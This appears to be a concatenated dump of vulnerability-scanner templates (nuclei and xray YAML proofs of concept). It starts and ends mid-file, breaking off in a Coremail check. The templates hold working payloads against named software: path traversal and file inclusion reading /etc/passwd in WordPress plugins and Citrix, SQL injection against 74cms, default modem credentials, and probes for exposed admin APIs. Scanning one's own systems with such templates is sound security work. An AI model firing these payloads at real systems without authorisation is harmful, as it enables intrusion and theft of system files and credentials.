19 |
20 | - type: status
21 | status:
22 | - 200
23 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml:
--------------------------------------------------------------------------------
1 | id: wp-simple-fields-lfi
2 |
3 | info:
4 | name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
5 | author: 0x240x23elu
6 | severity: high
7 | reference:
8 | - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html
9 | tags: wordpress,wp-plugin,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00"
15 |
16 | matchers:
17 | - type: regex
18 | regex:
19 | - "root:.*:0:0:"
20 | part: body
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wp-tutor-lfi.yaml:
--------------------------------------------------------------------------------
1 | id: wp-tutor-lfi
2 |
3 | info:
4 | name: WordPress Plugin tutor.1.5.3 - Local File Inclusion
5 | author: 0x240x23elu
6 | severity: high
7 | reference:
8 | - https://www.exploit-db.com/exploits/48058
9 | tags: wordpress,wp-plugin,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd"
15 |
16 | matchers:
17 | - type: regex
18 | regex:
19 | - "root:.*:0:0:"
20 | part: body
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wp-vault-lfi.yaml:
--------------------------------------------------------------------------------
1 | id: wp-vault-local-file-inclusion
2 |
3 | info:
4 | name: WP Vault 0.8.6.6 Local File Inclusion
5 | author: 0x_Akoko
6 | severity: high
7 | reference:
8 | - https://www.exploit-db.com/exploits/40850
9 | tags: wp-plugin,wordpress,lfi
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
15 |
16 | matchers-condition: and
17 | matchers:
18 |
19 | - type: regex
20 | regex:
21 | - "root:.*:0:0:"
22 |
23 | - type: status
24 | status:
25 | - 200
26 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wp-xmlrpc.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-xmlrpc-file
2 |
3 | info:
4 | name: WordPress xmlrpc
5 | author: udit_thakkur
6 | severity: info
7 | tags: wordpress
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/xmlrpc.php"
13 | matchers:
14 | - type: word
15 | words:
16 | - 'XML-RPC server accepts POST requests only.'
17 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wpdm-cache-session.yaml:
--------------------------------------------------------------------------------
1 | id: wpdm-cache-session
2 |
3 | info:
4 | name: Wpdm-Cache Session
5 | author: dhiyaneshDk
6 | severity: medium
7 | reference:
8 | - https://www.exploit-db.com/ghdb/7004
9 | tags: wordpress
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - '{{BaseURL}}/wp-content/uploads/wpdm-cache/'
15 | matchers-condition: and
16 | matchers:
17 | - type: word
18 | words:
19 | - "Index of /"
20 | - ".txt"
21 | - "wpdm-cache"
22 | condition: and
23 |
24 | part: body
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/web/pocs/nuclei/vulnerabilities/wordpress/wpmudev-pub-keys.yaml:
--------------------------------------------------------------------------------
1 | id: wpmudev-pub-keys
2 |
3 | info:
4 | name: Wpmudev Dashboard Pub Key
5 | author: dhiyaneshDk
6 | severity: medium
7 | reference:
8 | - https://www.exploit-db.com/ghdb/6443
9 | tags: wordpress
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - '{{BaseURL}}/wp-content/plugins/wpmudev-updates/keys/'
15 | matchers-condition: and
16 | matchers:
17 | - type: word
18 | words:
19 | - "Index of /"
20 | - ".pub"
21 | - "wpmudev"
22 | condition: and
23 |
24 | part: body
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/web/pocs/xray2/74cms-sqli-2.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-74cms-sqli-2
2 | manual: true
3 | transport: http
4 | set:
5 | rand: randomInt(200000000, 210000000)
6 | rules:
7 | r0:
8 | request:
9 | cache: true
10 | method: GET
11 | path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
12 | expression: response.body.bcontains(bytes(md5(string(rand))))
13 | expression: r0()
14 | detail:
15 | author: rexus
16 | links:
17 | - https://www.uedbox.com/post/30019/
18 |
--------------------------------------------------------------------------------
/web/pocs/xray2/74cms-sqli.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-74cms-sqli
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a
10 | expression: response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")
11 | expression: r0()
12 | detail:
13 | author: jinqi
14 | links:
15 | - https://www.t00ls.net/articles-54436.html
16 |
--------------------------------------------------------------------------------
/web/pocs/xray2/airflow-unauth.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-airflow-unauth
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /admin/
10 | expression: response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"DAGs
")
11 | expression: r0()
12 | detail:
13 | author: pa55w0rd(www.pa55w0rd.online/)
14 | links:
15 | - http://airflow.apache.org/
16 |
--------------------------------------------------------------------------------
/web/pocs/xray2/apache-kylin-unauth-cve-2020-13937.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /kylin/api/admin/config
10 | expression: response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
11 | expression: r0()
12 | detail:
13 | author: JingLing(github.com/shmilylty)
14 | links:
15 | - https://s.tencent.com/research/bsafe/1156.html
16 |
--------------------------------------------------------------------------------
/web/pocs/xray2/apache-nifi-api-unauthorized-access.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-nifi-api-unauthorized-access
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /nifi-api/flow/current-user
10 | follow_redirects: false
11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
12 | expression: r0()
13 | detail:
14 | author: wulalalaaa(https://github.com/wulalalaaa)
15 | links:
16 | - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html
17 |
--------------------------------------------------------------------------------
/web/pocs/xray2/apache-storm-unauthorized-access.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-apache-storm-unauthorized-access
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /api/v1/cluster/summary
10 | follow_redirects: false
11 | expression: response.status == 200 && response.body.bcontains(b"{\"totalMem\":") && response.body.bcontains(b"\"stormVersion\":")
12 | expression: r0()
13 | detail:
14 | author: wulalalaaa(https://github.com/wulalalaaa)
15 | links:
16 | - https://storm.apache.org/releases/current/STORM-UI-REST-API.html
17 |
--------------------------------------------------------------------------------
/web/pocs/xray2/bt742-pma-unauthorized-access.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-bt742-pma-unauthorized-access
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /pma/
10 | follow_redirects: false
11 | expression: response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php")
12 | expression: r0()
13 | detail:
14 | author: Facker007(https://github.com/Facker007)
15 | links:
16 | - https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A
17 |
--------------------------------------------------------------------------------
/web/pocs/xray2/chinaunicom-modem-default-password.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-chinaunicom-modem-default-password
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: POST
9 | path: /cu.html
10 | body: frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
11 | follow_redirects: false
12 | expression: response.status == 302 && response.headers["location"] == "/menu.gch"
13 | expression: r0()
14 | detail: {}
15 |
--------------------------------------------------------------------------------
/web/pocs/xray2/citrix-cve-2019-19781-path-traversal.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-citrix-cve-2019-19781-path-traversal
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /vpn/../vpns/cfg/smb.conf
10 | follow_redirects: false
11 | expression: response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
12 | expression: r0()
13 | detail:
14 | author: su(https://suzzz112113.github.io/#blog)
15 | links:
16 | - https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
17 |
--------------------------------------------------------------------------------
/web/pocs/xray2/citrix-xenmobile-cve-2020-8209.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-citrix-xenmobile-cve-2020-8209
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
10 | follow_redirects: false
11 | expression: response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
12 | expression: r0()
13 | detail:
14 | author: B1anda0(https://github.com/B1anda0)
15 | links:
16 | - https://nvd.nist.gov/vuln/detail/CVE-2020-8209
17 |
--------------------------------------------------------------------------------
/web/pocs/xray2/confluence-cve-2015-8399.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-confluence-cve-2015-8399
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /spaces/viewdefaultdecorator.action?decoratorName
10 | follow_redirects: false
11 | expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
12 | expression: r0()
13 | detail:
14 | author: whynot(https://github.com/notwhy)
15 | links:
16 | - https://www.anquanke.com/vul/id/1150798
17 |
--------------------------------------------------------------------------------
/web/pocs/xray2/consul-rexec-rce.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-consul-rexec-rce
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /v1/agent/self
10 | expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")'
11 | expression: r0()
12 | detail:
13 | author: imlonghao(https://imlonghao.com/)
14 | links:
15 | - https://www.exploit-db.com/exploits/46073
16 |
--------------------------------------------------------------------------------
/web/pocs/xray2/consul-service-rce.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-consul-service-rce
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /v1/agent/self
10 | expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true")'
11 | expression: r0()
12 | detail:
13 | author: imlonghao(https://imlonghao.com/)
14 | links:
15 | - https://www.exploit-db.com/exploits/46074
16 |
--------------------------------------------------------------------------------
/web/pocs/xray2/coremail-cnvd-2019-16798.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-coremail-cnvd-2019-16798
2 | manual: true
3 | transport: http
4 | rules:
5 | r0:
6 | request:
7 | cache: true
8 | method: GET
9 | path: /mailsms/s?func=ADMIN:appState&dumpConfig=/
10 | follow_redirects: false
11 | expression: response.status == 200 && response.body.bcontains(bytes("") && response.body.bcontains(b"